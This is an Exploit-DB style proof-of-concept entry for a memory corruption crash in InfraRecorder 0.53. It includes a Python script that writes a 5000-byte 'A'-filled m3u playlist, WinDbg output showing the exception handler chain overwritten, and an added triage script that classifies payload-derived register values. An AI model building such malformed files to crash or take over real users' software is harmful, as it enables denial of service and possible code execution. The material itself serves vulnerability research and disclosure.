InfraRecorder 0.53 - Memory Corruption (Denial of Service)

EDB-ID: 32707
CVE:
Author: sajith
Type: dos
Platform: Windows
Date: 2014-04-06


###########################################################
[~] Exploit Title: InfraRecorder Memory Corruption Exploit [DOS]
[~] Author: sajith
[~] Version: 0.53
[~] Vulnerable app link:
http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
[~] Tested on Windows XP SP3, English
###########################################################

input("hit enter to fuzz")

print("poc by sajith shetty")

try:
    # Write a 5000-byte playlist consisting solely of 'A' (0x41); the
    # oversized entry is what triggers the crash when the file is imported.
    with open("test.m3u", "wb") as f:
        f.write(b"\x41" * 5000)
    print("done")
except Exception as e:
    print("[+]error - " + str(e))



# Reproduce: in InfraRecorder, Edit > Import > test.m3u. WinDbg output at the crash:
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00157980 ebx=00b60000 ecx=108b1175 edx=00410041 esi=00410039 edi=00000113
#eip=7c910efe esp=0012c828 ebp=0012ca48 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#ntdll!wcsncpy+0x99f:
#7c910efe 8b39            mov     edi,dword ptr [ecx]  ds:0023:108b1175=????????
#0:000> !exchain
#0012ca38: ntdll!strchr+113 (7c90e900)
#0012cab8: *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\InfraRecorder\infrarecorder.exe
#infrarecorder+ba5b0 (004ba5b0)
#0012d07c: infrarecorder+10041 (00410041)
#Invalid exception stack at 00410041
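As an added triage aid (not part of sajith's PoC), the following Python 3 script parses the register line and the !exchain handler addresses from the WinDbg output above and reports which of them hold values derived from the 0x41 fill byte; the 0x00410041 form is what a byte of 'A' becomes after a char to wchar_t widening, which matches the crash site in ntdll!wcsncpy. Register values and handler addresses are copied from the page; the function names are assumptions.

```python
import re
from typing import Optional

# Constructed from the WinDbg output on the page: the register line and the
# three handler addresses printed by !exchain, re-joined onto single lines.
REGISTER_DUMP = ("eax=00157980 ebx=00b60000 ecx=108b1175 edx=00410041 "
                 "esi=00410039 edi=00000113 eip=7c910efe esp=0012c828 ebp=0012ca48")
EXCHAIN_HANDLERS = [0x7c90e900, 0x004ba5b0, 0x00410041]
PAYLOAD_BYTE = 0x41  # the PoC writes "\x41" * 5000


def parse_registers(dump: str) -> dict:
    """Return {name: value} for every reg=hex pair in a WinDbg register line."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"\b(e[a-z]{2})=([0-9a-fA-F]{8})", dump)}


def classify(value: int, byte: int = PAYLOAD_BYTE) -> Optional[str]:
    """How a 32-bit value relates to a single-byte fill pattern.

    'narrow'      every byte is the pattern byte (0x41414141)
    'utf16'       both 16-bit halves are the byte widened to UTF-16LE
                  (0x00410041): the input passed through a char -> wchar_t
                  conversion before it was copied over the stack
    'utf16-half'  only one half is the widened byte (0x00410039)
    None          not recognisably derived from the pattern
    """
    if value == int.from_bytes(bytes([byte]) * 4, "little"):
        return "narrow"
    halves = sum(1 for h in (value & 0xFFFF, value >> 16) if h == byte)
    return {2: "utf16", 1: "utf16-half"}.get(halves)


def triage(dump: str, handlers: list, byte: int = PAYLOAD_BYTE) -> dict:
    """Map each register / SEH handler slot whose value looks payload-derived
    to its classification; an SEH entry in the result means the overlong
    field reached the exception chain, i.e. more than a plain crash."""
    found = {}
    for name, val in parse_registers(dump).items():
        tag = classify(val, byte)
        if tag:
            found[name] = tag
    for i, h in enumerate(handlers):
        tag = classify(h, byte)
        if tag:
            found[f"seh[{i}]"] = tag
    return found


if __name__ == "__main__":
    for loc, tag in triage(REGISTER_DUMP, EXCHAIN_HANDLERS).items():
        print(f"{loc}: {tag}")
```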